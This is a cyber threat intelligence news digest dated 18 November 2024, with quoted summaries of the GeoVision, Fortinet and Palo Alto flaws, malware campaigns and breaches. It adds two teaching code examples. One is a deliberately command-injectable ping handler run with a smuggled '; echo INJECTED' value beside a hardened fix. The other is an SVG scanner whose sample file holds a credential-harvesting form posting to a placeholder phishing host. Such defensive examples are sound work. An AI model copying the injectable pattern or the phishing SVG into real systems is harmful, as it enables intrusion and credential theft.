Cyber Threat Intelligence 18 November 2024
Vulnerabilities
- Botnet Exploits GeoVision Zero-Day To Install Mirai Malware
"A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomining attacks. The flaw is tracked as CVE-2024-11120 and was discovered by Piotr Kijewski of The Shadowserver Foundation. It is a critical severity (CVSS v3.1 score: 9.8) OS command injection problem, allowing unauthenticated attackers to execute arbitrary system commands on the device. "Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device," warns Taiwan's CERT."
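The vulnerability class named above, unauthenticated OS command injection, is worth seeing side by side with its fix. The following is an added, generic illustration (not GeoVision firmware and not the exploited code path, which the advisory does not publish): a hypothetical "diagnostic ping" handler of an embedded web UI whose `target` value comes straight from the request. The vulnerable version pastes it into a shell command line; the hardened version allow-lists the value and execs without a shell.

```python
import ipaddress
import re
import subprocess

# Hypothetical handler names; the attacker controls `target`, e.g. from a
# query string of the device's web interface. Added example, not vendor code.

# Plain hostname: labels of letters, digits, dots and dashes; the first
# character must be alphanumeric so the value can never look like an option.
_HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def vulnerable_ping(target: str) -> str:
    """Injectable: the untrusted value is concatenated into a shell command."""
    cmd = "ping -c 1 -W 1 " + target
    # shell=True hands the whole string to /bin/sh, so a target such as
    # "127.0.0.1; echo INJECTED" runs a second command as the web server's
    # user (frequently root on embedded devices). Even if ping is absent,
    # the injected command still executes.
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def validate_target(target: str) -> str:
    """Allow-list the value: an IP literal or a plain hostname, nothing else."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"rejected target: {target!r}")


def hardened_ping_argv(target: str) -> list[str]:
    """Build argv for exec without a shell; validation happens first."""
    safe = validate_target(target)
    # No shell means no metacharacters, but argument injection (a value
    # starting with '-') would still be possible; the validator rules it out.
    return ["ping", "-c", "1", "-W", "1", safe]


def hardened_ping(target: str) -> str:
    argv = hardened_ping_argv(target)
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("vulnerable:", vulnerable_ping(payload).strip())
    try:
        hardened_ping(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

The two defences are independent: dropping `shell=True` removes the metacharacter problem, and the allow-list removes the option-injection problem that remains once the value is passed as a single argv element. Both are needed on a device that runs its web server as root.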
https://www.bleepingcomputer.com/news/security/botnet-exploits-geovision-zero-day-to-install-mirai-malware/
https://www.twcert.org.tw/en/cp-139-8237-26d7a-2.html
https://securityaffairs.com/171067/malware/ddos-botnet-exploits-geovision-zero-day.html
- Hop-Skip-FortiJump-FortiJumpHigher - Fortinet FortiManager CVE-2024-47575
"It’s been a tricky time for Fortinet (and their customers) lately - arguably, even more so than usual. Adding to the steady flow of vulnerabilities in appliances recently was a nasty CVSS 9.8 vulnerability in FortiManager, their tool for central management of FortiGate appliances. As always, the opinions expressed in this blogpost are of the watchTowr team alone. If you don't enjoy our opinions, please scream into a paper bag."
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
https://www.infosecurity-magazine.com/news/watchtowr-new-vulnerability/
- Palo Alto Networks Warns Of Critical RCE Zero-Day Exploited In Attacks
"Palo Alto Networks is warning that a critical zero-day vulnerability on Next-Generation Firewalls (NGFW) management interfaces, currently tracked as 'PAN-SA-2024-0015,' is actively being exploited in attacks. The flaw was originally disclosed on November 8, 2024, with Palo Alto Networks warning customers to restrict access to their next-generation firewalls because of a "potential" remote code execution (RCE) vulnerability impacting them. No signs of exploitation were detected at that time, but now, one week later, the situation has changed."
https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-critical-rce-zero-day-exploited-in-attacks/
https://therecord.media/palo-alto-networks-firewall-vulnerability-exploited
https://thehackernews.com/2024/11/pan-os-firewall-vulnerability-under.html
https://www.bankinfosecurity.com/palo-alto-reports-firewalls-exploited-using-unknown-flaw-a-26822
https://cyberscoop.com/palo-alto-expedition-firewall-exploit-cisa-kev/
https://www.infosecurity-magazine.com/news/palo-alto-confirms-new-0day/
https://www.securityweek.com/palo-alto-networks-confirms-new-firewall-zero-day-exploitation/
https://www.theregister.com/2024/11/15/palo_alto_networks_firewall_zeroday/
https://securityaffairs.com/171057/hacking/palo-alto-networks-zero-day-exploitation.html
Malware
- Report On DDoSia Malware Launching DDoS Attacks Against Korean Institutions
"The Russian hacktivist group NoName057(16) has been active since March 2022, and their goal is to launch DDoS attacks against targets with anti-Russian views. In November 2024, NoName057(16), along with the pro-Russian hacktivist groups Cyber Army of Russia Reborn and Alixsec, launched DDoS attacks against the websites of major South Korean government agencies. The attacks were believed to have been triggered by the remarks made by Minister of Foreign Affairs Cho Tae-yul and President Yoon Suk-yeol regarding the supply of weapons to Ukraine. As a result of these attacks, various South Korean organizations suffered damages."
https://asec.ahnlab.com/en/84531/
- BrazenBamboo Weaponizes FortiClient Vulnerability To Steal VPN Credentials Via DEEPDATA
"In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory."
https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/
https://thehackernews.com/2024/11/warning-deepdata-malware-exploiting.html
- Babble Babble Babble Babble Babble Babble BabbleLoader
"The pace of innovation and development in the malware detection market is relentless, the same goes for the development of malware itself. Constantly changing and adapting to create ever more evasive and capable payloads. One such sector of this market is the loader (also called crypter or packer) market. In today’s threat landscape, loaders have become a critical tool in cybercrime operations, serving as the backbone for delivering a range of malicious payloads. Loaders are often the first stage in an attack chain, designed to stealthily execute or inject malware, such as info-stealers or ransomware, into a target system."
https://intezer.com/blog/research/babble-babble-babble-babble-babble-babble-babbleloader/
- Thanos Operator Targets Police Department In United Arab Emirates
"The SonicWall Capture Labs threat research team has come across a variant of Thanos ransomware targeted at a police department in the United Arab Emirates (UAE). Thanos ransomware is a customizable and highly adaptable ransomware-as-a-service (RaaS) tool that allows cybercriminals to create and deploy ransomware tailored to their needs. It is known for its data-stealing capabilities, the ability to spread through networks and the use of advanced evasion techniques to avoid detection."
https://blog.sonicwall.com/en-us/2024/11/thanos-operator-targets-police-in-united-arab-emirates/
- Fake AI Video Generators Infect Windows, MacOS With Infostealers
"Fake AI image and video generators infect Windows and macOS with the Lumma Stealer and AMOS information-stealing malware, used to steal credentials and cryptocurrency wallets from infected devices. Lumma Stealer is a Windows malware and AMOS is for macOS, but both steal cryptocurrency wallets and cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers. This data is collected into an archive and sent back to the attacker, where they can use the information in further attacks or sell it on cybercrime marketplaces."
https://www.bleepingcomputer.com/news/security/fake-ai-video-generators-infect-windows-macos-with-infostealers/
- GitHub Projects Targeted With Malicious Commits To Frame Researcher
"GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions."
https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/
- Phishing Emails Increasingly Use SVG Attachments To Evade Detection
"Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code."
https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/
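The SVG explanation above is the reason these attachments matter to a mail gateway: an SVG is an XML document, not a bitmap, and it may legitimately carry a `<script>` element, event-handler attributes such as `onload`, and, through `<foreignObject>`, arbitrary HTML such as a credential form, all of which a browser will execute when the file is opened. The scanner below is an added example (not code from the BleepingComputer article) that flags those constructs in an attachment. The two sample SVGs are constructed for the example and the `phish.example` host is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed samples for the example; not taken from any real campaign.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="10" y="10" width="180" height="80" fill="#ddd"/>
  <text x="20" y="60">Invoice preview</text>
</svg>"""

SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     width="600" height="400" onload="init()">
  <script>function init(){ location.href = 'https://phish.example/login'; }</script>
  <foreignObject width="600" height="400">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <form action="https://phish.example/collect" method="post">
        <input name="email"/><input name="password" type="password"/>
      </form>
    </body>
  </foreignObject>
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">Open document</text></a>
</svg>"""

ACTIVE_ELEMENTS = {
    "script": "script element",
    "foreignobject": "foreignObject (can embed HTML such as a login form)",
    "form": "HTML form element",
    "iframe": "iframe element",
    "embed": "embed element",
    "object": "object element",
}


def _local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1].lower()


def scan_svg(data: str) -> list[str]:
    """Return a list of active-content findings; empty means nothing flagged."""
    findings = []
    # Entity declarations are unusual in an image and a classic XML abuse vector;
    # flag them before parsing rather than trusting the parser's defaults.
    if "<!ENTITY" in data:
        findings.append("internal DTD/entity declarations")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        findings.append(f"unparseable XML: {exc}")
        return findings
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(ACTIVE_ELEMENTS[name])
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):
                findings.append(f"event handler attribute {a}= on <{name}>")
            elif a == "href":
                v = value.strip().lower()
                if v.startswith("javascript:"):
                    findings.append(f"javascript: URI in href on <{name}>")
                elif v.startswith("data:") and not v.startswith("data:image/"):
                    findings.append(f"non-image data: URI in href on <{name}>")
    return findings


def is_suspicious(data: str) -> bool:
    return bool(scan_svg(data))


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, "->", scan_svg(sample) or "clean")
```

The checks key on structure rather than on payload strings, so obfuscating the JavaScript does not help the attacker: the `<script>` element and the `onload` attribute are still there to be found. Inline `data:image/...` hrefs are deliberately not flagged, since embedded raster images are common in legitimate SVGs, while any other `data:` MIME type in an href is treated as active content.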
Breaches/Hacks/Leaks
- Keyboard Robbers Steal 171K Customers' Data From AnnieMac Mortgage House
"A major US mortgage lender has told customers looking to make the biggest financial transaction of their lives that an intruder broke into its systems and saw data belonging to 171,000 of them. American Neighborhood Mortgage Acceptance Company, which trades as AnnieMac Home Mortgage, said between August 21 and 23, an unknown intruder "viewed and/or copied" some customer data."
https://www.theregister.com/2024/11/15/anniemac_data_breach/
- T-Mobile Confirms It Was Hacked In Recent Wave Of Telecom Breaches
"T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. "T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information," T-Mobile told the Wall Street Journal, which first reported about the breach. "We will continue to monitor this closely, working with industry peers and the relevant authorities.""
https://www.bleepingcomputer.com/news/security/t-mobile-confirms-it-was-hacked-in-recent-wave-of-telecom-breaches/
https://www.itnews.com.au/news/t-mobile-hacked-in-massive-chinese-breach-of-telecom-networks-613175
General News
- Bitfinex Hacker Gets 5 Years In Prison For 120,000 Bitcoin Heist
"A hacker responsible for stealing 119,754 Bitcoin in a 2016 hack on the Bitfinex cryptocurrency exchange was sentenced to five years in prison by U.S. authorities. The man, Ilya Lichtenstein, was arrested in February 2022 in Manhattan following a lengthy investigation led by the IRS, HSI, and the FBI, which managed to recover roughly 80% of the stolen cryptocurrency (94,000 Bitcoin). At the time of the theft, the 119,754 bitcoins were worth $78,000,000 but equaled $3.6 billion at the time of the seizure."
https://www.bleepingcomputer.com/news/security/bitfinex-hacker-gets-5-years-in-prison-for-120-000-bitcoin-heist/
https://thehackernews.com/2024/11/bitfinex-hacker-sentenced-to-5-years.html
https://www.bankinfosecurity.com/bitfinex-hacker-lichtenstein-sentenced-to-5-years-in-prison-a-26824
https://www.securityweek.com/man-who-stole-and-laundered-roughly-1b-in-bitcoin-is-sentenced-to-5-years-in-prison/
https://www.infosecurity-magazine.com/news/bitfinex-hacker-jailed-5-years/
https://securityaffairs.com/171029/cyber-crime/bitfinex-hacker-was-sentenced-to-5-years-in-prison.html
https://www.theregister.com/2024/11/15/bitfinix_intruder_sentenced/
- Threat Trend Report On Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums And Markets Of October 2024
"This trend report on the deep web and dark web of October 2024 is sectioned into Ransomware, Forums & Black Markets, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true."
https://asec.ahnlab.com/en/84530/
- Combating The Rise Of Federally Aimed Malicious Intent
"The public sector is facing a security crisis. The acceleration of deepfake videos, AI-generated threats, and nation-state cyberattacks has put the federal government under increasing pressure to protect its employees, agencies, and the general public. Last year, the FBI, the National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) released details on the "growing challenge" that deepfake threats present to a range of federal agencies."
https://www.darkreading.com/vulnerabilities-threats/combating-rise-federally-aimed-malicious-intent
- Lessons From OSC&R On Protecting The Software Supply Chain
"The complexity of today's software development — a mix of open source and third-party components, as well as internally developed code — has resulted in an abundance of vulnerabilities for attackers to exploit throughout the software supply chain. We've seen the direct effects of software supply chain attacks in incidents like the MOVEit and SolarWinds breaches, revealing that no industry sector, size of company, or stage of software development is immune. According to a survey from Enterprise Strategy Group (ESG), 91% of organizations experienced at least one software supply chain security incident in 2023, and 2024 hasn't seemed any better."
https://www.darkreading.com/application-security/lessons-from-osc-r-on-protecting-the-software-supply-chain
- AI’s Impact On The Future Of Web Application Security
"In this Help Net Security interview, Tony Perez, CEO at NOC.org, discusses the role of continuous monitoring for real-time threat detection, the unique risks posed by APIs, and strategies for securing web applications. Perez also addresses how AI-driven threats are shaping the future of web security and the need for adaptive defenses."
https://www.helpnetsecurity.com/2024/11/15/tony-perez-noc-org-web-application-security/
- Critical Vulnerabilities Persist In High-Risk Sectors
"Finance and insurance sectors found to have the highest number of critical vulnerabilities, according to Black Duck. The report, which analyzes data from over 200,000 dynamic application security testing (DAST) scans conducted by Black Duck on approximately 1,300 applications across 19 industry sectors from June 2023 to June 2024, found variations in vulnerability types and remediation practices."
https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/
- Cybersecurity Dominates Concerns Among The C-Suite, Small Businesses And The Nation
"Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data breach costs, it is no longer a question of whether cybersecurity matters but how deeply it affects every facet of modern operations."
https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/
- Indian Police Arrest Suspect In $230 Million WazirX Crypto Exchange Hack
"Delhi police have arrested a suspect allegedly linked to the theft of at least $230 million worth of cryptocurrency from the India-based platform WazirX earlier this year. The suspect, identified as Masud Alam from West Bengal, was detained on Thursday. The Indian newspaper Times of India described the arrest as “a significant breakthrough in the ongoing investigation” into the WazirX hack."
https://therecord.media/wazirx-crypto-exchange-hack-suspect-arrested-india
- Letting Chatbots Run Robots Ends As Badly As You'd Expect
"Science fiction author Isaac Asimov proposed three laws of robotics, and you'd never know it from the behavior of today's robots or those making them. The first law, "A robot may not injure a human being or, through inaction, allow a human being to come to harm," while laudable, hasn't prevented 77 robot-related accidents between 2015-2022, many of which resulted in finger amputations and fractures to the head and torso. Nor has it prevented deaths attributed to car automation and robotaxis."
https://www.theregister.com/2024/11/16/chatbots_run_robots/
https://arobey1.github.io/writing/jailbreakingrobots.html
- Will Passkeys Ever Replace Passwords? Can They?
"I have been playing around with passkeys, or as they are formally known, discoverable credentials. Think of passkeys as a replacement of passwords. They are defined in the Web Authentication (WebAuthn) specification of the W3C (World Wide Web Consortium). This work evolved from several prior efforts including those of the FIDO alliance (FIDO = Fast Identity Online)."
https://www.theregister.com/2024/11/17/passkeys_passwords/
Reference
Electronic Transactions Development Agency (ETDA)